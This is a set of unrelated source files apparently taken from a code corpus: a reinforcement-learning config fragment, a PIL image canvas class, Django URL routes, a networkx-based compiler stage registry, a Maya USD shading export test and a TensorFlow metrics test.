"noisy": False,
"num_atoms": 1,
"num_gpus": 0,
"prioritized_replay": False,
"prioritized_replay_alpha": 0.5,
"prioritized_replay_beta_annealing_timesteps": 2000000,
"rollout_fragment_length": 4,
"target_network_update_freq": 8000,
"timesteps_per_iteration": 10000,
"train_batch_size": 32,
"tf_session_args": {
# note: overriden by `local_tf_session_args`
"intra_op_parallelism_threads": 4,
"inter_op_parallelism_threads": 4,
# "gpu_options": {
# "allow_growth": True,
# },
# "log_device_placement": False,
"device_count": {"CPU": 2},
# "allow_soft_placement": True, # required by PPO multi-gpu
},
# Override the following tf session args on the local worker
"local_tf_session_args": {
"intra_op_parallelism_threads": 4,
"inter_op_parallelism_threads": 4,
},
}
model_config = {
# "model": {
# "fcnet_hiddens": [256, 256],
# "fcnet_activation": "tanh",
# "use_lstm": False,
# "max_seq_len": 20,
# "lstm_cell_size": 256,
# "lstm_use_prev_action_reward": False,
# },
}
eval_config = {
"evaluation_interval": None, # I think this means every x training_iterations
"evaluation_config": {
"explore": False,
"exploration_fraction": 0,
"exploration_final_eps": 0,
"evaluation_num_episodes": 10,
"horizon": 100,
"env_config": {
"dummy_eval": True, # hack Used to check if we are in evaluation mode or training mode inside Ray callback on_episode_end() to be able to write eval stats
"transition_noise": 0
if "state_space_type" in env_config["env_config"]
and env_config["env_config"]["state_space_type"] == "discrete"
else tune.function(lambda a: a.normal(0, 0)),
"reward_noise": tune.function(lambda a: a.normal(0, 0)),
"action_loss_weight": 0.0,
},
},
}
value_tuples = []
for config_type, config_dict in var_configs.items():
for key in config_dict:
assert (
isinstance(var_configs[config_type][key], list)
), "var_config should be a dict of dicts with lists as the leaf values to allow each configuration option to take multiple possible values"
value_tuples.append(var_configs[config_type][key])
cartesian_product_configs = list(itertools.product(*value_tuples))
print("Total number of configs. to run:", len(cartesian_product_configs))
|
the-stack_106_30701 | from view import View
from PIL import Image # type: ignore
class Canvas:
def __init__(self, view: View) -> None:
self.view = view
self.image_number = 0
def paint(self) -> Image:
image = Image.new("RGB", (self.view.width, self.view.height))
self.view.paint(image)
return image
def save(self, count=1) -> None:
for _ in range(count):
image = self.paint()
image.save(f"img/img{self.image_number:08d}.jpg")
self.image_number += 1
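

if __name__ == "__main__":
    # Minimal usage sketch (not part of the original module): `_SolidView` is a
    # hypothetical stand-in for a concrete View from the local `view` module,
    # providing just the width/height/paint interface that Canvas relies on.
    class _SolidView:
        width, height = 64, 48

        def paint(self, image):
            # Fill the whole frame with a single colour.
            image.paste((30, 144, 255), (0, 0, self.width, self.height))

    canvas = Canvas(_SolidView())
    frame = canvas.paint()
    print(frame.size)  # (64, 48)
    # canvas.save(count=3)  # would write img/img00000000.jpg ... (needs an img/ directory)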
|
the-stack_106_30702 | from django.conf.urls import url
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
    url(r'^$', views.get_image, name='homepage'),
    url(r'^user/', views.userpage, name='username'),
    url(r'^image/(?P<id>[0-9]+)$', views.image_details, name='image'),
    url(r'^comment', views.p_detail, name='comment'),
    url(r'^image-like/(?P<pk>[0-9]+)$', views.imagelike, name='imagepost_like'),
    url(r'^search/', views.search, name='searchr'),
]
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
the-stack_106_30704 | from collections import namedtuple
import networkx as nx
from fud.errors import UndefinedStage, MultiplePaths
Edge = namedtuple("Edge", ["dest", "stage"])
class Registry:
"""
Defines all the stages and how they transform files from one stage to
another.
"""
def __init__(self, config):
self.config = config
self.graph = nx.DiGraph()
def register(self, stage, src=None, tar=None):
"""
Defines a new stage named `stage` that converts programs from `src` to
`tar`
"""
if src is None:
src = stage.name
if tar is None:
tar = stage.target_stage
self.graph.add_edge(src, tar, stage=stage)
def make_path(self, start, dest, through=[]):
"""
Compute a path from `start` to `dest` that contains all stages
mentioned in `through`.
Raises MultiplePaths if there is more than one matching path for the
(start, dest) pair.
"""
nodes = self.graph.nodes()
if start not in nodes:
raise UndefinedStage(start)
if dest not in nodes:
raise UndefinedStage(dest)
all_paths = list(nx.all_simple_edge_paths(self.graph, start, dest))
# Compute all stage pipelines that can be run.
stage_paths = []
# Minimum cost path
min_cost = None
for path in all_paths:
through_check = set(through)
stage_path = []
# Cost of the Path
path_cost = None
for (src, dst) in path:
if src in through_check:
through_check.remove(src)
stage = self.graph.get_edge_data(src, dst)["stage"]
stage_path.append(stage)
# Get the cost of the path if there is any
# print(self.config.get(("stages", stage.name, "priority")))
cost = self.config.get(("stages", stage.name, "priority"))
if cost is not None:
if path_cost is None:
path_cost = cost
else:
path_cost += cost
# If there are no items left in the --through check then add it
if len(through_check) == 0:
                # If this path has a cost, keep only the cheapest path(s);
                # several paths may remain only if they tie on minimal cost.
                if path_cost is not None:
                    if min_cost is None or path_cost < min_cost:
                        stage_paths = [stage_path]
                        min_cost = path_cost
                    elif min_cost == path_cost:
                        stage_paths.append(stage_path)
                elif min_cost is None:
                    stage_paths.append(stage_path)
if len(stage_paths) > 1:
p = []
for path in all_paths:
if len(path) == 0:
continue
# Add the starting src
path_str = path[0][0]
for (_, dst) in path:
path_str += f" → {dst}"
cost = self.config.get(("stages", dst, "priority"))
if cost is not None:
path_str += f" (cost: {cost})"
p.append(path_str)
raise MultiplePaths(start, dest, "\n".join(p))
elif len(stage_paths) == 0:
return None
else:
return stage_paths[0]
def __str__(self):
stages = {}
transforms = []
for (src, dst, attr) in sorted(self.graph.edges(data=True)):
transforms.append((src, dst, attr["stage"].description))
if src not in stages:
stages[src] = []
stages[src].append(dst)
all_stages = ""
for (src, dsts) in stages.items():
d = ", ".join(dsts)
all_stages += f"\n{src} → {d}"
all_transforms = "\n".join([f"{s} → {e}: {d}" for (s, e, d) in transforms])
return f"""List of possible stage transformations: {all_stages}
Legend:
{all_transforms}
"""
|
the-stack_106_30705 | #!/pxrpythonsubst
#
# Copyright 2018 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import unittest
from pxr import Usd
from pxr import UsdShade
from maya import cmds
from maya import standalone
class testUsdExportShadingInstanced(unittest.TestCase):
@classmethod
def setUpClass(cls):
standalone.initialize('usd')
# Stage with simple (non-nested) instancing.
mayaFile = os.path.abspath('InstancedShading.ma')
cmds.file(mayaFile, open=True, force=True)
usdFilePath = os.path.abspath('InstancedShading.usda')
cmds.loadPlugin('pxrUsd')
cmds.usdExport(mergeTransformAndShape=True, file=usdFilePath,
shadingMode='displayColor', exportInstances=True,
materialsScopeName='Materials',
exportCollectionBasedBindings=True,
exportMaterialCollections=True,
materialCollectionsPath="/World")
cls._simpleStage = Usd.Stage.Open(usdFilePath)
# Stage with nested instancing.
mayaFile = os.path.abspath('NestedInstancedShading.ma')
cmds.file(mayaFile, open=True, force=True)
usdFilePath = os.path.abspath('NestedInstancedShading.usda')
cmds.loadPlugin('pxrUsd')
cmds.usdExport(mergeTransformAndShape=True, file=usdFilePath,
shadingMode='displayColor', exportInstances=True,
materialsScopeName='Materials',
exportCollectionBasedBindings=True,
exportMaterialCollections=True,
materialCollectionsPath="/World")
cls._nestedStage = Usd.Stage.Open(usdFilePath)
@classmethod
def tearDownClass(cls):
standalone.uninitialize()
def testInstancedGeom(self):
"""Tests that different shader bindings are correctly authored on
instanced geometry."""
worldPath = "/World" # Where collections are authored
redMat = "/World/Materials/blinn1SG"
redPaths = ["/World/redCube", "/World/redSphere"]
blueMat = "/World/Materials/phong1SG"
bluePaths = [
"/World/blueCube", "/World/blueSphere", "/World/blueSphere2"]
instanceMasters = [
"/InstanceSources/World_redSphere_blueSphereMultiAssignShape",
"/InstanceSources/World_blueCube_blueCubeShape"]
for path in redPaths:
prim = self._simpleStage.GetPrimAtPath(path)
self.assertTrue(prim.IsInstance())
bindingAPI = UsdShade.MaterialBindingAPI(prim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), redMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
for path in bluePaths:
prim = self._simpleStage.GetPrimAtPath(path)
self.assertTrue(prim.IsInstance())
bindingAPI = UsdShade.MaterialBindingAPI(prim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), blueMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
for path in instanceMasters:
prim = self._simpleStage.GetPrimAtPath(path)
self.assertTrue(prim)
self.assertFalse(
prim.HasRelationship(UsdShade.Tokens.materialBinding))
def testInstancedGeom_Subsets(self):
"""Tests that instanced geom with materials assigned to subsets are
automatically de-instanced."""
multiAssignPrim = self._simpleStage.GetPrimAtPath(
"/World/blueSphereMultiAssign")
self.assertFalse(multiAssignPrim.IsInstanceable())
shape = multiAssignPrim.GetChild("Shape")
self.assertFalse(shape.IsInstance())
subset1 = shape.GetChild("initialShadingGroup")
self.assertTrue(subset1)
mat, _ = UsdShade.MaterialBindingAPI(subset1).ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), "/World/Materials/initialShadingGroup")
subset2 = shape.GetChild("blinn1SG")
self.assertTrue(subset2)
mat, _ = UsdShade.MaterialBindingAPI(subset2).ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), "/World/Materials/blinn1SG")
def testUninstancedGeom(self):
"""Tests a basic case of non-instanced geometry with bindings."""
worldPath = "/World" # Where collections are authored
redMat = self._simpleStage.GetPrimAtPath("/World/Materials/blinn1SG")
uninstancedPrim = self._simpleStage.GetPrimAtPath("/World/notInstanced")
self.assertFalse(uninstancedPrim.IsInstance())
bindingAPI = UsdShade.MaterialBindingAPI(uninstancedPrim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPrim(), redMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
def testNestedInstancedGeom(self):
"""Tests that different shader bindings are correctly authored on
instanced geometry within nested instances."""
worldPath = "/World" # Where collections are authored
greenMat = "/World/Materials/blinn1SG"
greenPaths = [
"/World/SimpleInstance1/Shape",
"/World/ComplexA/NestedA/Base1/BaseShape1",
"/World/ComplexA/NestedB/Base1/BaseShape1",
"/World/Extra/Base3/Shape",
"/World/ComplexB/NestedA/Base1/BaseShape1",
"/World/ComplexB/NestedB/Base1/BaseShape1"]
blueMat = "/World/Materials/blinn2SG"
bluePaths = [
"/World/SimpleInstance2/Shape",
"/World/ComplexA/NestedA/Base2/BaseShape1",
"/World/ComplexA/NestedB/Base2/BaseShape1",
"/World/ComplexB/NestedA/Base2/BaseShape1",
"/World/ComplexB/NestedB/Base2/BaseShape1"]
instanceMasters = [
"/InstanceSources/World_ComplexA_NestedA_Base1_BaseShape1" +
"/Shape",
"/InstanceSources/World_SimpleInstance1_SimpleInstanceShape1" +
"/Shape"]
for path in greenPaths:
prim = self._nestedStage.GetPrimAtPath(path)
self.assertTrue(prim, msg=path)
self.assertTrue(prim.IsInstanceProxy())
bindingAPI = UsdShade.MaterialBindingAPI(prim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), greenMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
for path in bluePaths:
prim = self._nestedStage.GetPrimAtPath(path)
self.assertTrue(prim, msg=path)
self.assertTrue(prim.IsInstanceProxy())
bindingAPI = UsdShade.MaterialBindingAPI(prim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), blueMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
for path in instanceMasters:
prim = self._nestedStage.GetPrimAtPath(path)
self.assertTrue(prim)
self.assertFalse(
prim.HasRelationship(UsdShade.Tokens.materialBinding))
if __name__ == '__main__':
unittest.main(verbosity=2)
|
the-stack_106_30708 | import zqtflearn
import unittest
import numpy as np
import tensorflow as tf
class TestMetrics(unittest.TestCase):
"""
Testing metric functions from zqtflearn/metrics
"""
def test_binary_accuracy(self):
with tf.Graph().as_default():
input_data = tf.placeholder(shape=[None, 1], dtype=tf.float32)
y_true = tf.placeholder(shape=[None, 1], dtype=tf.float32)
ba = zqtflearn.metrics.accuracy()
ba.build(input_data, y_true)
acc_op = ba.tensor
X = np.array([1,-1,1,1,-1,-1]).reshape([-1, 1])
Y = np.array([1,0,1,0,0,1]).reshape([-1, 1])
with tf.Session() as sess:
binary_accuracy = sess.run(acc_op, feed_dict={input_data: X, y_true: Y})
print ("binary_accuracy = %s" % binary_accuracy)
self.assertEqual(acc_op.m_name, "binary_acc")
self.assertLess(abs(binary_accuracy-4.0/6), 0.0001)
def test_categorical_accuracy(self):
with tf.Graph().as_default():
input_data = tf.placeholder(shape=[None, 2], dtype=tf.float32)
y_true = tf.placeholder(shape=[None, 2], dtype=tf.float32)
ba = zqtflearn.metrics.accuracy()
ba.build(input_data, y_true)
acc_op = ba.tensor
X = np.array([1,-1, -1, 1, 0.5, 0]).reshape([-1, 2])
Y = np.array([1, 0, 0, 1, 0, 1]).reshape([-1, 2])
with tf.Session() as sess:
accuracy = sess.run(acc_op, feed_dict={input_data: X, y_true: Y})
print ("categorical accuracy = %s" % accuracy)
self.assertEqual(acc_op.m_name, "acc")
self.assertLess(abs(accuracy - 2.0/3), 0.0001)
X = np.array([1,-1, -1, 1, 0.5, 0]).reshape([-1, 2])
Y = np.array([1, 0, 0, 1, 1, 0]).reshape([-1, 2])
with tf.Session() as sess:
accuracy = sess.run(acc_op, feed_dict={input_data: X, y_true: Y})
print ("categorical accuracy = %s" % accuracy)
self.assertEqual(accuracy, 1.0)
if __name__ == "__main__":
unittest.main()
|